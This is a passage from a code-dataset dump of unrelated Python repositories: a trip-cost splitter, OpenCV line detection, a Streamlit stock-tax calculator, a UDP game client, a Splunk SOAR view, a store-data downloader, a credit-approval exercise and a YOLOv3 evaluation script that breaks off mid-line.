['A','B','C','D']\n df = pd.DataFrame(matrix, index=names, columns=names)\n\n matrix = data_to_matrix(df,data,names)\n analysis1 = analysis_1(matrix,names)\n\n analysis2 = analysis_2(matrix,names)\n\n analysis3 = analysis_3(matrix,names)\n\n context = {\n 'transactions' : data2,\n 'names' : names,\n 'analysis1' : analysis1,\n 'analysis2' : analysis2,\n 'analysis3' : analysis3\n }\n # print(matrix)\n return render(request, 'analysis.html', context)\n\ndef data_to_matrix(df,data,names):\n for row in data:\n amt_from = row.amt_from\n amt_to = row.amount_to\n amount = row.amount\n for col in amt_to:\n df[col][amt_from] += amount//len(amt_to)\n return df\ndef analysis_1(mat, names):\n a1 = []\n for name in names:\n a1.append((name,mat[name][name]))\n #print(name+\" : \"+str(mat[name][name]))\n return a1\n\n#spend by him\ndef analysis_2(mat, names):\n a2 = []\n for name in names:\n amt = 0\n for itr in names:\n amt += mat[itr][name]\n a2.append((name,amt))\n # print(name+\" : \"+str(amt))\n return a2\n\n#amount that has needs to be given to others\ndef analysis_3(mat, names):\n a3 = []\n for name in names:\n for itr in names:\n if mat[itr][name] != 0 and itr!=name:\n # print(itr+\"->\"+name+\" : \"+str(mat[itr][name]))\n a3.append([itr,name,mat[itr][name]])\n return a3\n","repo_name":"Saketh7382/projectRohini","sub_path":"Trip_cost/trips/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"22881082905","text":"#!/usr/bin/env python\nimport numpy as np\nimport math\nimport cv2\n\nfilename = '01855_32_0.png'\norg_img = cv2.imread(filename)\nimg = np.copy(org_img) #create a copy of org_img\n#cv2.imshow('org_img', org_img)\n\n####################################\n#1) Convert to gray scale\ngray_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n#cv2.imshow('gray_img', gray_img)\n\n####################################\n#2) Gaussian blur\nblur_img = cv2.GaussianBlur(org_img, (5,5), 0)\n#cv2.imshow('blur_img', blur_img)\n\n\n####################################\n#3) Canny edge detection (display the edge image)\nedges = cv2.Canny(org_img, 150, 200)\n#cv2.imshow('edges', edges)\n\n\n#####################################\n#Apply ROI\nmask = np.zeros_like(edges)\nvertices = [np.array([[0,480], [0, 350], [340, 200], [640, 350], [640, 480]], dtype = np.int32)]\ncv2.fillPoly(mask, vertices, (255,255,255))\nedges_ROI = cv2.bitwise_and(edges, mask)\n#cv2.imshow('mask', mask)\n#cv2.imshow('masked', masked)\n\n\n\n####################################\n#s4) Hough transform (display the line image)\n\n\nedges_copy = np.copy(edges_ROI)\nthreshold = 10\nminLineLength = 30\nmaxLineGap = 10\nlines = cv2.HoughLinesP(\n\tedges_copy,\n\t1, # rho\n\tnp.pi / 180, #theta\n\tthreshold, #threshold\n\tnp.array([]), #lines\n\tminLineLength, #min line length\n\tmaxLineGap #max line gap\n\t)\n\n# Use the following code to create a line image\nline_img = np.zeros((img.shape[0],img.shape[1],3),dtype=np.uint8)\nline_color=[0, 255, 0]\nline_thickness=1\ndot_color = [0, 255, 0]\ndot_size = 3\nfor line in lines:\n for x1, y1, x2, y2 in line:\n cv2.line(line_img, (x1, y1), (x2, y2), line_color, line_thickness)\n cv2.circle(line_img, (x1, y1), dot_size, dot_color, -1)\n cv2.circle(line_img, (x2, y2), dot_size, dot_color, -1)\n#cv2.imshow('lines', line_img)\n\n\n####################################\n#5) Overlay (i.e., blend) the line image with the original image\noverlay = cv2.addWeighted(org_img, 0.8, line_img, 1.0, 0.0)\ncv2.imshow('overlay', overlay)\n\n'''\n####################################\nslopes = []\nlines_rev = []\nfor line in lines:\n\tfor x1, y1, x1, y2 in line:\t\t\n\t\ts = 0\n\t\tif x2-x1 != 0:\n\t\t\ts = float((y2-y1)/(x2-x1))\t\t\t\n\t\telse:\n\t\t\tslopes.extend([9999])\n\t\tif s < 1:# & s > 0.3:\n\t\t\t\tlines_rev = line\n\t\t\n\nfor line in lines_rev:\n for x1, y1, x2, y2 in line:\n cv2.line(line_img, (x1, y1), (x2, y2), line_color, line_thickness)\n cv2.circle(line_img, (x1, y1), dot_size, dot_color, -1)\n cv2.circle(line_img, (x2, y2), dot_size, dot_color, -1)\n\n#for slope in slopes:\n#\tif slope < 1.0 && slope > 0.3:\n\n#slops_abs = abs(slopes)\n\n'''\n\n\ncv2.waitKey(0) #press any key to quit\ncv2.destroyAllWindows()","repo_name":"idenzer/vision_practice","sub_path":"line_detection_class_practice.py","file_name":"line_detection_class_practice.py","file_ext":"py","file_size_in_byte":2679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"21252408842","text":"import pandas as pd\nimport numpy as np\nimport streamlit as st\nimport re\nimport io\nimport datetime\nimport sys\n\nst.set_option('deprecation.showfileUploaderEncoding', False)\n\n\n@st.cache(allow_output_mutation=True)\ndef cleaning(dataset):\n\n df_orig.drop([x for x in dataset.columns if x.startswith(\"Unn\")], axis=1 , inplace=True)\n\n dataset['Data Negócio'] = pd.to_datetime(dataset['Data Negócio'],dayfirst=True)\n\n def correction(x):\n if \"C\" in x:\n x = \"C\"\n elif 'V' in x:\n x = \"V\"\n return x\n\n\n dataset['C/V']=dataset[\"C/V\"].apply(correction)\n\n def fracionario_to_normal(x):\n if x.endswith(\"F\"):\n x = x[:-1]\n return x\n\n dataset['Código'] = dataset[\"Código\"].apply(fracionario_to_normal)\n dataset.drop(['Mercado', 'Prazo','Especificação do Ativo' ], axis=1, inplace=True)\n\n dataset.to_csv(\"df.csv\")\n\n #return dataset\n\n\ndef check_consistency():\n\n df = pd.read_csv(\"df.csv\", index_col=0)\n df['Data Negócio'] = pd.to_datetime(df['Data Negócio'], dayfirst=True)\n \n #status = True\n\n fail = {'ticker':'', 'date':'', \"index\":'' , 'reason':''}\n for ticker in df[\"Código\"].unique():\n\n if len(df[(df[\"C/V\"] == \"V\") & (df[\"Código\"] == ticker)].values) > 0:\n\t#check to insure the sell date is after the purchase date. It guarantee that we have a mean price to calculate the profit.\n \n first_sell_index = df[(df[\"C/V\"] == \"V\") & (df[\"Código\"] == ticker)]['Data Negócio'].index[0]\n first_sell_date = df.iloc[first_sell_index]['Data Negócio']\n total_sold = df[(df[\"C/V\"] == \"V\") & (df[\"Código\"]==ticker)]['Quantidade'].sum()\n total_purchased = df[(df[\"C/V\"] == \"C\") & (df[\"Código\"]==ticker)]['Quantidade'].sum()\n\n \n\t#check if the sold ticker has a purchased price. It is important to calculate the mean price of the ticker and then profit.\n if len(df.iloc[:first_sell_index][(df[\"C/V\"] == \"C\") & (df[\"Código\"] == ticker)]['Data Negócio']) == 0:\n fail['ticker'] = ticker\n fail['index'] = first_sell_index\n fail['date'] = first_sell_date\n fail['reason'] = 'before'\n status = True\n break\n #check if there are more sold stocks than the purchased ones.\n elif total_sold>total_purchased:\n fail['ticker'] = ticker\n fail['index'] = first_sell_index\n fail['date'] = first_sell_date\n fail['reason'] = 'less'\n status = True\n break\n \n else:\n status = False \n \n return status ,fail\n\ndef add(fail):\n df = pd.read_csv(\"df.csv\", index_col=0)\n df['Data Negócio'] = pd.to_datetime(df['Data Negócio'], dayfirst=True)\n\n \n ticker, first_sell_date, first_sell_index, reason = fail.values()\n\n if reason == 'before': \n st.subheader('AVISO')\n st.markdown(f'''No arquivo tem informação sobre a venda da ação **{ticker}** na data **{first_sell_date.date()}** \n mas está faltando informação sobre a sua compra nos dias anteriores''')\n\n data_compra = st.date_input(f\"A data da compra da ação {ticker}\", value = first_sell_date- datetime.timedelta(days=1), max_value=first_sell_date)\n data_compra = pd.to_datetime(data_compra)\n quantidade_compra = st.number_input(\"Quantidade\", min_value=df.iloc[first_sell_index]['Quantidade'])\n preço_compra = st.number_input(label=\"Preço\", min_value = 0.)\n\n if st.button(label=\"Click 2X\", key=1):\n line = pd.DataFrame({'Data Negócio':data_compra, 'C/V':\"C\", 'Código':ticker, 'Quantidade':quantidade_compra\n , 'Preço (R$)': preço_compra, 'Valor Total (R$)': preço_compra*quantidade_compra}, index = [first_sell_index])\n df = pd.concat([df.iloc[:first_sell_index], line, df.iloc[first_sell_index:]]).reset_index(drop=True)\n df.sort_index(inplace=True)\n df.to_csv(\"df.csv\")\n\n if reason == 'less':\n total_sold = df[(df[\"C/V\"] == \"V\") & (df[\"Código\"]==ticker)]['Quantidade'].sum()\n total_purchased = df[(df[\"C/V\"] == \"C\") & (df[\"Código\"]==ticker)]['Quantidade'].sum()\n different = total_sold - total_purchased\n st.subheader('AVISO')\n st.markdown(f\"No arquivo tem mais {different} venda da ação {ticker} do que compra. Por favor informa a data e o preço da compra.\")\n \n data_compra = st.date_input(f\"A data da compra da ação {ticker}\", value = first_sell_date- datetime.timedelta(days=1))\n data_compra = pd.to_datetime(data_compra)\n quantidade_compra = st.number_input(\"Quantidade\", min_value=different)\n preço_compra = st.number_input(label=\"Preço\", min_value = 0.)\n\n if st.button(label=\"Enter 2X \", key=2):\n line = pd.DataFrame({'Data Negócio':data_compra, 'C/V':\"C\", 'Código':ticker, 'Quantidade':quantidade_compra\n , 'Preço (R$)': preço_compra, 'Valor Total (R$)': preço_compra*quantidade_compra}, index = [first_sell_index])\n df = pd.concat([df.iloc[:first_sell_index], line, df.iloc[first_sell_index:]]).reset_index(drop=True)\n df.sort_index(inplace=True)\n df.to_csv(\"df.csv\")\n\n \n \n #raise st.ScriptRunner.StopException\n\n\n@st.cache\ndef general_view():\n df = pd.read_csv(\"df.csv\", index_col=0)\n df['Data Negócio'] = pd.to_datetime(df['Data Negócio'],dayfirst=True)\n df.sort_index(inplace=True)\n\n #df=df1.copy()\n\n #finding the DT-trade operations\n DT_trade = {\"date\":[], \"ticker\":[], 'index':[]}\n\n dates = df[\"Data Negócio\"].unique()\n\n for date in dates:\n tickers = df[df[\"Data Negócio\"]==date]['Código'].unique()\n for ticker in tickers:\n if all(x in df[(df[\"Data Negócio\"]==date) & (df[\"Código\"]==ticker)][\"C/V\"].values for x in [\"C\",\"V\"]):\n DT_trade['index'].append(df[(df[\"Data Negócio\"]==date) & (df[\"Código\"]==ticker)][\"C/V\"].index)\n DT_trade['date'].append(date)\n DT_trade['ticker'].append(ticker)\n\n DT_trade[\"index\"] = [item for sublist in DT_trade['index'] for item in sublist]\n\n #creating a new column to mark the ST/DT trades\n\n df['DT/ST'] = \"ST\"\n\n df.at[DT_trade['index'], 'DT/ST'] = 'DT'\n\n #Calculating the operational costs of the operations.\n #the Valor for the purchased stocks turns to negative cuz we loss money!\n df[\"Valor Total (R$)\"] = np.where(df[\"C/V\"] == \"C\", -1* df[\"Valor Total (R$)\"], df[\"Valor Total (R$)\"])\n\n # the below costs are strange! I havnt found them in the website of Clear\n #df['Custo de Operação-ST'] = np.where(df[\"C/V\"] == \"V\", -1*df['Valor Total (R$)'] * (0.000325 + 0.00005),df['Valor Total (R$)'] * (0.000325))\n\n df['Custos-ST'] = -1*abs(df['Valor Total (R$)'] * (0.000275 + 0.00005))\n df['Custos-ST'] = round(df['Custos-ST'],3)\n\n df['Custos-DT'] = 0.\n\n #calculating in a DT-trade how stocks are divided between ST-trade e DT-trade\n df['Quant-DT'] = 0\n df['Quant-ST'] = df[\"Quantidade\"]\n df['Lucro-DT'] = 0. \n df['Lucro-ST'] = 0. \n\n for DT in DT_trade['date']:\n for ticker in df[(df[\"Data Negócio\"]==DT)&(df['DT/ST'] == \"DT\")][\"Código\"].unique() :\n dt = df[(df[\"Data Negócio\"]==DT) & (df[\"Código\"]==ticker)]\n sell_list = []\n purchase_list = []\n for index,row in dt.iterrows():\n if row['C/V'] == 'V':\n sell_list.append(index)\n if row['C/V'] == 'C':\n purchase_list.append(index)\n \n for s_index, p_index in zip(sell_list,purchase_list):\n sell_quantity = df.iloc[s_index][\"Quantidade\"]\n purchase_quantity = df.iloc[p_index][\"Quantidade\"]\n sell_price = df.iloc[s_index][\"Preço (R$)\"]\n purchase_price = df.iloc[p_index][\"Preço (R$)\"]\n dt_quantity = min(sell_quantity, purchase_quantity)\n st_quantity = max(sell_quantity, purchase_quantity) - dt_quantity\n dt_operation_cost = dt_quantity*(sell_price + purchase_price) * (0.0002 + 0.00005)\n \n df.at[p_index, 'Custos-DT'] = -1*abs(dt_quantity*(purchase_price) * (0.0002 + 0.00005))\n df.at[s_index, 'Custos-DT'] = -1*abs(dt_quantity*(sell_price) * (0.0002 + 0.00005))\n\n df.at[s_index,'Quant-DT'] = dt_quantity\n df.at[s_index,'Quant-ST'] = df.iloc[s_index][\"Quantidade\"] - dt_quantity\n\n #As some part of negociation might be ST trade\n df.at[p_index, 'Custos-ST'] = -1*abs(st_quantity*(purchase_price) * (0.000275 + 0.00005))\n df.at[s_index, 'Custos-ST'] = -1*abs(st_quantity*(sell_price) * (0.000275 + 0.00005))\n\n df.at[p_index, 'Quant-DT'] = dt_quantity\n df.at[p_index, 'Quant-ST'] = df.iloc[p_index][\"Quantidade\"] - dt_quantity\n df.at[s_index, 'Lucro-DT'] = dt_quantity * (sell_price - purchase_price) - dt_operation_cost\n\n #correcting \"DT\" to \"ST\"\n s = [x[0] for x in zip(sell_list,purchase_list)] \n s2 = [x for x in sell_list if x not in s]\n df.at[s2, 'DT/ST'] = \"ST\"\n\n p = [x[1] for x in zip(sell_list,purchase_list)] \n p2 = [x for x in purchase_list if x not in p]\n df.at[p2, 'DT/ST'] = \"ST\"\n \n\n #calculationg the mean cost of a purchased stock and its evolution by new acquisition for ST trade. \n tickers = df[\"Código\"].unique() \n # for calculating the mean cost we need to follow the positions of each ticker in each operation.\n # If position==0 the mean cost resets to the first purchase's price.\n df[\"Posição\"] = 0\n for ticker in tickers:\n position = 0\n for index, row in df[(df[\"Código\"] == ticker)].iterrows():\n if row['Quant-DT'] == 0 or row['Quant-ST'] != 0:\n try: \n if row['C/V'] == 'C':\n position = position + row['Quant-ST']\n df.at[index,\"Posição\"] = position \n \n\n elif row['C/V'] == 'V':\n position = position - row['Quant-ST']\n df.at[index,\"Posição\"] = position\n \n\n except:\n st.write(f\"Erro no calculo de posição da ação {ticker} na data {row['Data Negócio']}\")\n \n \n #using the df['Position'] is possible to calculate the mean cost.\n df[\"PM\"] = 0.\n for ticker in tickers:\n position_prev = 0\n mean_prev = 0\n #calculating custo medio for ST-trade operations \n for index, row in df[(df[\"Código\"] == ticker)].iterrows():\n if row['Quant-ST'] != 0:\n \n try:\n if row['C/V']=='C':\n if position_prev == 0:\n medio = (row['Quant-ST']*row['Preço (R$)'] -row['Custos-ST'])/row['Quant-ST']\n df.at[index,\"PM\"] = medio\n mean_prev = medio\n position_prev = row['Posição']\n else:\n \n medio = (mean_prev*position_prev + row['Quant-ST']*row['Preço (R$)'] -row['Custos-ST'])/\\\n (row['Quant-ST'] + position_prev)\n df.at[index,\"PM\"] = medio\n mean_prev = medio\n position_prev = row['Posição']\n\n if row['C/V']=='V':\n #mean_prev = row[\"PM\"]\n position_prev = row['Posição']\n \n\n\n except:\n st.write(f\"Erro no calculo do custo medio no {ticker} na data {row['Data Negócio']}, error{sys.exc_info()}\")\n st.write(row['Quant-ST'], position_prev)\n\n \n #calculating the profit of each sell\n\n #for ST-trade\n for ticker in tickers:\n for index, row in df[(df[\"Código\"] == ticker)].iterrows():\n if row['Quant-ST'] != 0:\n if row[\"C/V\"] == 'C':\n mean_cost = row['PM']\n elif row[\"C/V\"] == 'V':\n gain = row['Quant-ST']*row['Preço (R$)'] + row[\"Custos-ST\"]\n costs = row['Quant-ST']*mean_cost #mean_cost is a negative value cuz we have paid money to purchase a stock\n net_gain = round(gain - costs,3)\n df.at[index, 'Lucro-ST'] = net_gain\n \n\n return df\n\n\ndef DT_trade_imposto(df):\n\n df = df[df[\"DT/ST\"]==\"DT\"].copy()\n for index in df.index:\n df.at[index, \"DARF\"] = df.loc[index][\"Lucro-DT\"]* 0.20\n \n df_group = df[['Data Negócio', 'C/V', 'Código', 'Quantidade', \n 'Valor Total (R$)', 'Lucro-ST', 'Lucro-DT',\"DT/ST\", \"DARF\"]].groupby(['Data Negócio', \"Código\", \"C/V\"]).sum()\n\n imposto_DT = df_group['DARF'].sum()\n\n st.subheader(\"DT-Trade\")\n\n st.write(f\"O total imposto devido em relação as operações DT-trade no periodo escolhido é {round(imposto_DT,2)}\")\n\n return df_group[df_group['DARF']!=0]\n\n\ndef ST_trade_imposto(df):\n\n df = df[df[\"DT/ST\"]==\"ST\"].copy()\n \n for y in df[\"Data Negócio\"].dt.year.unique():\n for m in df[df[\"Data Negócio\"].dt.year ==y][\"Data Negócio\"].dt.month.unique():\n venda_mes = df[(df[\"C/V\"]==\"V\") & (df[\"Data Negócio\"].dt.month ==m) & (df[\"Data Negócio\"].dt.year ==y)]['Valor Total (R$)'].sum()\n count = 0\n if venda_mes >= 20000:\n count = 1\n for index in df[(df[\"C/V\"] == 'V') & (df[\"Data Negócio\"].dt.month == m) & (df[\"Data Negócio\"].dt.year == y)].index:\n df.at[index, \"DARF\"] = df.loc[index][\"Lucro-ST\"]* 0.15\n\n\n valor = df[(df[\"C/V\"] == 'V') & (df[\"Data Negócio\"].dt.month == m) & (df[\"Data Negócio\"].dt.year == y)][\"DARF\"].sum()\n st.subheader(\"ST-Trade\")\n st.write(f\"O total imposto devido em relação as operações ST-trade no mes {m} do ano {y} escolhido é {round(valor,2)}R$\")\n \n \n if count == 0:\n st.write(\"Não há nenhuma tributação devido as operações ST-trade no intervalo escolhido.\")\n \n df_group = df[['Data Negócio', 'C/V', 'Código', 'Quantidade', \n'Valor Total (R$)','Lucro-ST', 'Lucro-DT', 'DT/ST', \"DARF\"]].groupby(['Data Negócio', \"Código\", \"C/V\"]).sum()\n \n \n return df_group[df_group['DARF']!=0]\n\n\ndef impostos(dataset,year ='todos',month='todos',DT='todos',modalidade='todos'):\n\n if modalidade == \"todos\":\n df = dataset.copy()\n elif modalidade =='DT':\n df = dataset[dataset['DT/ST']==\"DT\"].copy()\n elif modalidade == 'ST':\n df = dataset[dataset['DT/ST']==\"ST\"].copy()\n else:\n print(\"Erro de modalidade\")\n\n \n if year != 'todos' and month != 'todos' and DT != 'todos':\n df_new = df[(df[\"Data Negócio\"].dt.year == year) & (df[\"Data Negócio\"].dt.month == month) & (df[\"Data Negócio\"].dt.DT == DT)].copy()\n elif year != 'todos' and month != 'todos':\n df_new = df[(df[\"Data Negócio\"].dt.year == year) & (df[\"Data Negócio\"].dt.month == month)].copy()\n elif year != 'todos':\n df_new = df[(df[\"Data Negócio\"].dt.year == year)].copy()\n else:\n df_new = df.copy()\n\n #creating a new column for DARF (tax)\n df_new[\"DARF\"] = 0.\n\n #Calculating the tax for the DT-trades\n if modalidade == 'DT':\n df_group = DT_trade_imposto(df_new)\n df_group[\"DT/ST\"] = \"DT\"\n\n #Calculating the tax for the ST-trades\n if modalidade == 'ST':\n df_group = ST_trade_imposto(df_new)\n df_group[\"DT/ST\"] = \"ST\"\n\n #calculating the tax for both types\n if modalidade =='todos':\n df_group1 = DT_trade_imposto(df_new)\n df_group1[\"DT/ST\"] = \"DT\"\n\n df_group2 = ST_trade_imposto(df_new)\n df_group2[\"DT/ST\"] = \"ST\"\n\n df_group = pd.concat([df_group1,df_group2])\n\n return df_group\n\n\n\n\n#Initialization\nst.title(\"Análise Tributária do Aviso de Negociação de Ativos (ANA)\")\nst.markdown(\"O ANA é um documento emitido por B3 que resume todas as operações no mercado de ações Brasileiro. Esse documento se encontra no [https://cei.b3.com.br](https://cei.b3.com.br), no menu **Extratos e Informativos** -> **Negociação de ativos**. É um arquivo de Excel com nome InfoCEI.xls. É crucial que o arquivo ANA contenha todas as operações pois os preços das compras são necessários para calcular o custo medio de cada ação, ou seja, no arquivo tem que ter no minimo uma compra para cada ação antes da sua venda.\")\n\n#file_buffer = None\nfile_buffer = st.file_uploader(\"Upload o ANA\", type=[\"xls\"])\n#text_io = io.TextIOWrapper(file_buffer, encoding='utf-8')\n\nif file_buffer:\n df_orig = pd.read_excel(file_buffer, skiprows=10, skipfooter=4)\n\n cleaning(df_orig)\n\n status, fail = check_consistency()\n #st.write(status, fail)\n if status:\n #st.write(\"Add function trigged\")\n add(fail)\n else: \n #st.write(\"General View launched\")\n df = general_view()\n #configuration od sidebar\n years = df[\"Data Negócio\"].dt.year.unique().tolist()\n months = df[\"Data Negócio\"].dt.month.unique().tolist()\n days = np.sort(df[\"Data Negócio\"].dt.day.unique()).tolist()\n\n month_convert= {1: \"Janeiro\", 2:\"Fevereiro\", 3:\"Março\", 4:'April', 5: 'Maio', 6:\"Junho\", 7:'Julho', 8:\"Agosto\",\n 9: \"Setembro\", 10: \"Outubro\", 11:\"Novembro\", 12:'Dezembro'}\n\n months = [month_convert[i] for i in months]\n\n years.insert(0,'todos')\n months.insert(0, 'todos')\n days.insert(0, 'todos')\n\n st.sidebar.header(\"Configurar a Data\")\n\n year = st.sidebar.selectbox(\n \"Escolhe o ano\",years)\n\n month = st.sidebar.selectbox(\n \"Escolhe o mes\", months)\n if month != 'todos':\n month = [i for i in month_convert.keys() if month_convert[i]==month][0]\n\n DT = st.sidebar.selectbox(\n \"Escolhe o dia\",days)\n\n modalidade = st.sidebar.selectbox(\n \"Escolhe a modalidade (DT-trade e/ou ST-trade)\",\n ('todos', 'ST', 'DT'))\n\n st.header(\"Uma Visão Geral das Operações\")\n\n #main part\n\n #df = general_view(df_check)\n #st.dataframe(df, width=1024)\n df_show = df.copy()\n df_show['Data Negócio'] = df_show['Data Negócio'].dt.date\n st.dataframe(df_show.style.set_precision(2))\n\n st.header(\"Os Impostos\")\n\n #impostos(df, year= year, month=month, DT=DT, modalidade=modalidade)\n st.dataframe(impostos(df, year= year, month=month, DT=DT, modalidade=modalidade))\n\n st.markdown('O script desse App se encontra no Github [ibovespa-imposto](https://github.com/vnikoofard/ibovespa-imposto)')\n","repo_name":"vnikoofard/ibovespa-imposto","sub_path":"ibovespa_imposto.py","file_name":"ibovespa_imposto.py","file_ext":"py","file_size_in_byte":19072,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"36648102097","text":"import pickle\nimport socket\nimport time\n\nhost = '192.168.1.15'\nfirstport = 12345\nclientSock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\nclientSock.settimeout(1)\n\ndef sendAndRecp(message):\n start = time.time()\n clientSock.connect_ex((host, firstport))\n clientSock.sendto(pickle.dumps(message), (host, firstport))\n try:\n data, serveur = clientSock.recvfrom(2048)\n dataUncode = pickle.loads(data)\n elapsed = time.time() - start\n\n\n if __name__ == '__main__':\n print('serveur says:' + str(dataUncode) + ' in ' + str(elapsed) + 'ms')\n return dataUncode\n except TimeoutError:\n print('REQUEST TIMED OUT')\n\nif __name__ == '__main__':\n sendAndRecp([4,9,12])\n","repo_name":"yohemm/grab-the-player","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"38383886417","text":"import json\n\nfrom django.http import HttpResponse\n\n\ndef display_query_results(provides, all_results, context):\n\n headers = []\n\n headers_set = set()\n for summary, action_results in all_results:\n for result in action_results:\n header_data = result.get_data()\n\n if header_data:\n headers += list(header_data[0].keys())\n\n if not headers_set:\n headers_set.update(headers)\n headers = sorted(headers_set)\n\n context['ajax'] = True\n if 'start' not in context['QS']:\n context['headers'] = headers\n return '/widgets/generic_table.html'\n\n adjusted_names = {}\n\n start = int(context['QS']['start'][0])\n length = int(context['QS'].get('length', ['5'])[0])\n end = start + length\n cur_pos = 0\n rows = []\n total = 0\n for summary, action_results in all_results:\n for result in action_results:\n data = result.get_data()\n total += len(data)\n for item in data:\n cur_pos += 1\n if (cur_pos - 1) < start:\n continue\n if (cur_pos - 1) >= end:\n break\n row = []\n\n for h in headers:\n row.append({ 'value': item.get(adjusted_names.get(h, h)) })\n rows.append(row)\n\n content = {\n \"data\": rows,\n \"recordsTotal\": total,\n \"recordsFiltered\": total,\n }\n\n return HttpResponse(json.dumps(content), content_type='text/javascript') # nosemgrep\n","repo_name":"splunk-soar-connectors/sqlite","sub_path":"sqlite_view.py","file_name":"sqlite_view.py","file_ext":"py","file_size_in_byte":1513,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"35422839373","text":"from src.products import download_store_data, load_slugs_dict\n\n\ndef main():\n num_queries = download_store_data(\n use_preset_operation=False, include_dlc=False, verbose=True\n )\n slugs_dict = load_slugs_dict(num_chunks=num_queries)\n return\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"woctezuma/epic-games-ratings","sub_path":"download_store_products.py","file_name":"download_store_products.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"29325529359","text":"ingreso= int(input(\"Ingrese sus ingresos en pesos\"))\nanio= int(input(\"Ingrese su año de nacimiento\"))\nedad= 2020-int(anio)\nnumeroh=int(input(\"Ingrese su numero de hijos\"))\naniosp= int(input(\"Ingrese años que pertenece a nuestro banco\"))\nestado=str(input(\"Estado civil s)soltero, c)casado\")) \nvive=str(input(\"Vive en u)urbano, r)rural\"))\ncredito=\"RECHAZADO\"\nif aniosp>10 and numeroh>=2:\n credito=\"APROBADO\"\n \nif estado==\"c\" or estado==\"C\" and numeroh >3 and edad>45 and edad<55 :\n credito=\"APROBADO\"\n \nif ingreso>2500000 and estado==\"s\" or estado==\"S\" and vive==\"u\" or vive==\"U\":\n credito=\"APROBADO\"\n \nif ingreso>3500000 and aniosp>5:\n credito=\"APROBADO\"\n \nif vive==\"r\" or vive==\"R\" and estado==\"c\" or estado==\"C\" and numeroh <2:\n credito=\"APROBADO\"\n \nprint (credito)","repo_name":"pabloschwarzenberg/grader","sub_path":"hito1_ej3/hito1_ej3_0a13ad6321829ba303c05cb365277a02.py","file_name":"hito1_ej3_0a13ad6321829ba303c05cb365277a02.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"38995761933","text":"#! /usr/bin/env python\n# coding=utf-8\n\n\nimport sys\nimport os\nimport numpy as np\nimport tensorflow as tf\nfrom tqdm import tqdm\nfrom PIL import Image\nfrom core import utils, yolov3\nfrom core.dataset import dataset, Parser\n\ncoco_ids = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 27, 28, 31, 32,\n 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58,\n 59, 60, 61, 62, 63, 64, 65, 67, 70, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 84, 85, 86, 87, 88,\n 89, 90]\n\nsess = tf.Session()\n\n\nIMAGE_H, IMAGE_W = 416, 416\nCLASSES = utils.read_coco_names('./data/coco.names')\nNUM_CLASSES = len(CLASSES)\nANCHORS = utils.get_anchors('./data/coco_anchors.txt', IMAGE_H, IMAGE_W)\nCKPT_FILE = \"/home/common/pretrained_models/checkpoint/yolov3.ckpt\"\nIOU_THRESH = 0.5\nSCORE_THRESH = 0.001\n\nall_detections = []\nall_annotations = []\nall_aver_precs = {CLASSES[i]:0. for i in range(NUM_CLASSES)}\n\ntest_tfrecord = \"/home/common/datasets/tfrecords/5k.tfrecords\"\nparser = Parser(IMAGE_H, IMAGE_W, ANCHORS, NUM_CLASSES)\ntestset = dataset(parser, test_tfrecord , batch_size=1, shuffle=None, repeat=False)\n\n\nimages_tensor, *y_true_tensor = testset.get_next()\nmodel = yolov3.yolov3(NUM_CLASSES, ANCHORS)\nwith tf.variable_scope('yolov3'):\n pred_feature_map = model.forward(images_tensor, is_training=False)\n y_pred_tensor = model.predict(pred_feature_map)\n\nsaver = tf.train.Saver()\nsaver = tf.train.import_meta_graph('/home/common/pretrained_models/checkpoint/yolov3.ckpt.meta')\nsaver.restore(sess, CKPT_FILE)\ndt_result_path = \"results/pt_cocoapi.json\"\nimglist_path = \"data/4954.txt\"\nimage_bbox_path=\"bbox/\"\n# total_img_num=5000\nif os.path.exists(dt_result_path):\n os.remove(dt_result_path)\n\nlabels = utils.read_coco_names('./data/coco.names')\n\nwith open(imglist_path) as f:\n total_img_list = f.readlines()\n total_img_list = [x.strip() for x in total_img_list]\n total_img_num = len(total_img_list)\n\nwith open(dt_result_path, \"a\") as new_p:\n image_idx = 0\n new_p.write(\"[\")\n\n for image_path in total_img_list:\n\n if (os.path.exists(image_path)):\n print(image_idx, image_path)\n\n orig_index = int(image_path[50:56])\n img = Image.open(image_path)\n img = img.convert('RGB')\n orig_width, orig_height = img.size\n\n y_pred, y_true, image = sess.run([y_pred_tensor, y_true_tensor, images_tensor])\n pred_boxes = y_pred[0][0]\n pred_confs = y_pred[1][0]\n pred_probs = y_pred[2][0]\n image = Image.fromarray(np.uint8(image[0]*255))\n\n boxes, scores, classes = utils.cpu_nms(pred_boxes, pred_confs*pred_probs, NUM_CLASSES,\n score_thresh=SCORE_THRESH, iou_thresh=IOU_THRESH)\n classes = [] if classes is None else classes.tolist()\n # print(\"pred_labels_list\",pred_labels_list)\n\n # image_bbox = utils.draw_boxes(img, boxes, scores, classes, labels, [IMAGE_H, IMAGE_W], is_show=False)\n # image_bbox.save(image_bbox_path+str(orig_index)+'.jpg')\n\n for j in range(len(classes)):\n coco_id = coco_ids[int(classes[j])]\n left,top ,right,bottom = boxes[j]\n\n left = max(left, 0)\n top = max(top, 0)\n right = min(right, 416)\n bottom = min(bottom, 416)\n\n left = round(left * orig_width / 416, 4)\n top = round(top * orig_height / 416, 4)\n right = right * orig_width / 